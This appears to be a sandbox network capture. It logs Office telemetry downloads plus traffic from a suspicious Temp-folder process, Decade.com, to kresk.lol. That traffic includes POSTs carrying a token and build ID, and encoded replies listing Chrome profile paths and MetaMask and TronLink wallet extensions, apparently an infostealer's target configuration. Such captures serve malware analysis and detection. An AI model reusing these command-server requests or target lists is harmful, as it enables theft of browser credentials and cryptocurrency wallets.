2024-12-04 11:17:09 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49759	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:09 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:09 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:09 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: de914170-201e-0000-68ad-45a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111709Z-1746fd949bdxk6n6hC1EWRdr8c000000010g0000000035na x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:09 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:09 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:09 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:09 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111709Z-1746fd949bd6zq92hC1EWRry480000000150000000002533 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:09 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49760	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:09 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:10 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:09 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 431871c3-501e-0047-55cc-45ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111709Z-1746fd949bdwt8wrhC1EWRu6rg00000001a0000000003tqu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:10 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49762	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:10 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3ECTJEK689RQQIMOZM7Y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 45 4b 36 38 39 52 51 51 49 4d 4f 5a 4d 37 59 0d 0a 43 6f 6e 74 Data Ascii: ------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------3ECTJEK689RQQIMOZM7YContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------3ECTJEK689RQQIMOZM7YCont
2024-12-04 11:17:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:10 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:11 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:12 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:11 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 1b86d58a-f01e-0071-54ce-45431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111711Z-1746fd949bd6zq92hC1EWRry48000000016g000000000ens x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:12 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:11 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:12 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111711Z-1746fd949bdxk6n6hC1EWRdr8c000000012g000000000a2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:12 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:11 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:12 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:11 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111711Z-1746fd949bdzd2qvhC1EWRcygw00000000y0000000002bfc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:12 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49766	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:11 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:12 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:11 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111711Z-1746fd949bdjrnwqhC1EWRpg28000000015g000000005gxt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:12 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:11 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:12 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:12 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111712Z-1746fd949bdnq7x2hC1EWRpxr000000000x0000000006pt8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:12 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49768	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:12 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:12 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------JE3OP8YU3EKF3EU3OZ5PCont
2024-12-04 11:17:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:13 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
